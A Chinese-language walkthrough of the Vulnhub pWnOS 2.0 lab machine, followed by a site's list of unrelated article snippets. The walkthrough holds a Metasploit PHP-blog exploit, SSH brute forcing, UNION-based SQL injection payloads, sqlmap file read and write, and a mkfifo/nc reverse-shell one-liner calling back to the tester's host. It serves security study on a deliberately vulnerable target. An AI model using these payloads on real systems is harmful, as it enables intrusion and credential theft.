Vulnhub靶机:PWNOS_ 2.0 (PRE-RELEASE)

news2024/12/29 9:39:54

目录

  • 介绍
  • 信息收集
  • 网站探测
  • 漏洞发现
  • 提权
    • 搜寻数据库配置文件
    • SSH爆破
  • 第2种打法
  • 网站探测
    • Sql注入(手工)
    • Sql注入(sqlmap)
    • 读取文件
    • 写入文件
  • 提权
  • 参考

介绍

系列:pWnOS(此系列共2台)
发布日期:2011年7月4日
难度:中
运行环境:VMware Workstation
目标:取得 root 权限
补充:靶机是静态IP,因此需要配置网卡为10.10.10.0
学习:

  • 主机发现
  • 端口扫描+漏洞扫描
  • CMS漏洞利用
  • SQL读写文件
  • 敏感信息提权

靶机地址:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

信息收集

已经知道靶机是静态ip:10.10.10.100

nmap -p- 10.10.10.100
nmap -p22,80 -A 10.10.10.100
nmap -p22,80 --script=vuln 10.10.10.100

在这里插入图片描述

网站探测

打开之后,可能需要登录,先看看nmap发现的目录
在这里插入图片描述

是个什么cms,直接搜索没搜出来
在这里插入图片描述

通过页面源代码,搜索出来了
在这里插入图片描述

漏洞发现

在这里插入图片描述

尝试执行运行失败了,网上搜索一下,说是安装个东西就行了,懒得弄了,直接msf吧
在这里插入图片描述

看起来是创建了一个账户,然后上传了一个php后门获取到了一个会话

search Simple PHP Blog 0.4.0
use 0
set rhosts 10.10.10.100
set URI /blog
exploit

在这里插入图片描述

在这里插入图片描述

提权

搜寻数据库配置文件

发现了数据库配置文件,但是连接不上数据库,说明密码有误,如何解决?
在这里插入图片描述

搜索系统中有无同名的文件,然后就发现了,并且顺利连接了数据库,由于泄露的敏感文件中提到了"ch16",于是查询到一条用户记录,通过在线网站查询得知密码是:killerbeesareflying
在这里插入图片描述

在这里插入图片描述

SSH爆破

现在已经得到了一些密码,懒得一个一个尝试了,直接爆破。没想到靶机的ssh算法有些老旧了,hydra不能爆破,那只好换别的工具来爆破了。爆破得到root的密码是:root@ISIntS

medusa -M ssh -h 10.10.10.100 -U ./username -P ./pass | grep SUCCESS

在这里插入图片描述

第2种打法

网站探测

登录口用户名位置输入单引号引发报错,那不得sqlmap走一波?
在这里插入图片描述

Sql注入(手工)

  1. order by获取当前数据表列数

8正常,其他数字错误,说明有8列
在这里插入图片描述

  1. union select查看哪一列数据显示在界面上。第4列能够显示

在这里插入图片描述

  1. 查询数据库版本,当前数据库名字

在这里插入图片描述

在这里插入图片描述

  1. 获取数据库表名,发现只有一张表:users
email=' union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--+&pass=1&submit=Login&submitted=TRUE

在这里插入图片描述

  1. 查看表users的列名
email=' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='users'-- &pass=1&submit=Login&submitted=TRUE

在这里插入图片描述

  1. 获取指定列中的数据
email=' union select 1,2,3,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- &pass=1&submit=Login&submitted=TRUE

在这里插入图片描述

Sql注入(sqlmap)

发现存在sql注入,虽然sqlmap没有破解出密码,但是通过在线网站查询得知密码是:killerbeesareflying

sqlmap -r 1.txt  --dbs --dump
POST /login.php HTTP/1.1
Host: 10.10.10.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://10.10.10.100
Connection: close
Referer: http://10.10.10.100/login.php
Cookie: PHPSESSID=0ur4mnc22qt9ue1d0dvu857v74
Upgrade-Insecure-Requests: 1

email=%27&pass=1&submit=Login&submitted=TRUE

在这里插入图片描述

读取文件

试了一下,可以读取文件

sqlmap -r 1.txt -v 1 --file-read="/etc/passwd"

在这里插入图片描述

在这里插入图片描述

尝试写入文件,这个时候有点尴尬,不是很确定靶机的web目录是不是/var/www,那就试着读取/var/www/index.php,至此确认了网站目录。
在这里插入图片描述

写入文件

看起来写入的方式有点瑕疵,凑活用吧,反正不影响弹shell
在这里插入图片描述

测试发现靶机的nc不能直接弹shell,url编码如下命令,成功拿到shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.128 4444 >/tmp/f

在这里插入图片描述

再来演示一下sqlmap写入文件,很奇怪,即便是tmp目录我都写不进去

sqlmap -r  1.txt  --file-write ./1.php --file-dest /tmp/123456.php

在这里插入图片描述

直接在靶机上搜,搜不到上传的文件。
在这里插入图片描述

提权

提权的方式同第一种打法,不再赘述。

参考

黑客零基础第三章-Web漏洞实战-SQL注入pWnOS: 2.0

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/111363.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【前端-React Native】移动端原生开发整合React Native Elements教程-安卓示例

目录一、移动开发和web开发的区别二、什么是React Native?三、如何实现安卓和IOS用一套代码开发四、React Native开发实战1. 安装Android studio2. 使用Expo创建工程3. 启动4. 使用UI框架React Active Elements5. 扩展:使用UI框架antd Design Mobile RN五、项目结构…

Hadoop综合项目——二手房统计分析(Hive篇)

Hadoop综合项目——二手房统计分析(Hive篇) 文章目录Hadoop综合项目——二手房统计分析(Hive篇)0、 写在前面1、Hive统计分析1.1 本地数据/HDFS数据导入到Hive1.2 楼龄超过20年的二手房比例1.3 四大一线城市各楼层地段的平均价格1…

没有基础转行学编程,靠谱吗?能找到工作吗?

在日常生活中,以及在知乎上,有很多人咨询职业生涯的抉择。他们大都对自己的职业现状不满意,打算学习编程成为一名程序员。 为什么想要做程序员? 答案五花八门,其中「工资高」「好找工作」「有职业发展」是很常见的理由…

代码质量管理平台实战| SonarQube 安装、配置及 JaCoCo、Maven 集成

SonarQube 是一个用于代码质量管理的开源平台,用于管理源代码的质量。同时 SonarQube 还对大量的持续集成工具提供了接口支持,可以很方便地在持续集成中使用 SonarQube。此外, SonarQube 的插件还可以对 Java 以外的其他编程语言提供支持&…

请求量太大扛不住怎么办?进来学一招

hello,大家好呀,我是小楼。 上篇文章《一言不合就重构》 说了我最近重构的一个系统,虽然重构完了,但还在灰度,这不,在灰度过程中又发现了一个问题。 背景 这个问题简单说一下背景,如果不明白…

数据结构之排序【直接插入排序和希尔排序的实现及分析】

引言: 今天天气还是依然的冷,码字越来越不容易了,本来上次写了一个比较好的引言,但是因为电脑第二天没电,并且我没有保存,现在找不到了,所以今天我们的引言就这样吧!今天给大家介绍…

Zookeeper 4 Zookeeper JavaAPI 操作 4.3 Curator API 常用操作【添加节点】

Zookeeper 【黑马程序员Zookeeper视频教程,快速入门zookeeper技术】 文章目录Zookeeper4 Zookeeper JavaAPI 操作4.3 Curator API 常用操作4.3.1 添加节点4 Zookeeper JavaAPI 操作 4.3 Curator API 常用操作 4.3.1 添加节点 直接开始编写 测试方法 先写一下&a…

Web入门开发【五】- 线上部署

欢迎来到霍大侠的小院,我们来学习Web入门开发的系列课程。 首先我们来了解下这个课程能学到什么? 1、你将可以掌握Web网站的开发全过程。 2、了解基础的HTML,CSS,JavaScript语言。 3、开发自己的第一个网站。 4、认识很多对编…

南卡与JBL蓝牙耳机哪款比较好?数码资深玩家带你深度评测了解

马上到来2023新的一年,不会还有人使用传统有线耳机吧?那你就属最落后的那位了,随着生活水平的提高,科技的快速发展,有线耳机逐渐被真无线蓝牙耳机所取代。现在走在马路上都能看见许多人佩戴着耳机,然而&…

机器学习 | 朴素贝叶斯

一.基本原理 基于条件独立的假设,先计算输入和输出的联合概率密度,然后根据所输入的x计算y的概率,然后选择具有最大后验概率的类作为它的类别 二.优缺点 优点 小规模数据集表现好,适合多分类对于在小数据集上有显著特征的相关对…

Scikit-network-02:载图

载图 在Scikit网络中,图形由其scipy的压缩稀疏行格式中的邻接矩阵(或二部图矩阵)表示。在本教程中,我们提供了一些方法来实例化此格式的图。 from IPython.display import SVGimport numpy as np from scipy import sparse impo…

SQL注入渗透与攻防(九)之布尔盲注

目录 1.什么是布尔盲注? 2.如何进行布尔盲注? 案列演示: 1.什么是布尔盲注? Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。 我们这里拿sql…

15Python文件操作

文件处理 01. 文件的概念 1.1 文件的概念和作用 计算机的 文件,就是存储在某种 长期储存设备 上的一段 数据长期存储设备包括:硬盘、U 盘、移动硬盘、光盘… 1.2 文件的存储方式 在计算机中,文件是以 二进制 的方式保存在磁盘上的 文本…

论文理解--DEEP COMPRESSION

原文链接: https://github.com/mit-han-lab/amc/security https://zhuanlan.zhihu.com/p/108096347 https://zhuanlan.zhihu.com/p/510905067 摘要 结论: 1、deep compression:由三阶段pipeline组成:pruning(剪枝)、 trained quantilization…

452页24万字智慧城市顶层设计及智慧应用解决方案

智慧城市总体设计 2.1 智慧城市核心技术 2.1.1 物联网 智慧城市是一个有机结合的大系统,涵盖了更透切的感知、更全面的互连,更深入的智能。物联网是智慧城市中非常重要的元素,它侧重于底层感知信息的采集与传输,城市范围内泛在网方…

无需调用Tecplot,PFC后处理技巧为你plot精美科研图

导读:PFC提供了非常美观的可视化处理的窗口—plot,用户可以在这里对模型的运行状态进行检查,也可以将Plot中的视图输出进行处理。一般来说plot中的图片质量足够用于常规的论文配图,当然用户也可以导出数据到tecplot中进行后处理&a…

【UE4 第一人称射击游戏】08-使用“AK47”发射子弹

上一篇: 【UE4 第一人称射击游戏】07-添加“AK47”武器 本节效果: 步骤: 1.在“Blueprints”文件夹内添加一个Actor蓝图,命名为“Projectile_Base”,该蓝图用于表示子弹 双击打开“Projectile_Base”,添加…

期货开户的身份识别验证

无论你是开通商品期货、原油期货还是股指期货以及期权,现在都支持网上办理!原油期货和股指期货以及期权品种都是在商品期货账户的基础上满足条件后再另外开通交易权限。叁格期权小编在这里为各位投资者详细介绍商品期货网上开户流程。 一、开户前准备 …

文件透明加密,保护重要数据的安全性

各种泄露事件使人们对信息安全问题的高度关注,随着加密技术的不断完善,主流透明加密技术被广泛应用于企业加密软件中。那么,这个技术如何保护电脑?有什么优点? 文件透明加密是最近几年发展出来的一种文件加解密技术。所…

RK3568平台开发系列讲解(工具命令篇)vim 编辑器的使用

🚀返回专栏总目录 文章目录 一、vim 编辑器有三种模式二、vim 编辑器移动光标三、vim 编辑器支持快速定位四、vim 编辑器的文本的复制和粘贴五、vim 编辑器使用快捷键来复制六、vim 编辑器的删除七、vim 编辑器的撤销八、vim 编辑器的查找九、vim 编辑器的替换十、vim 编辑器…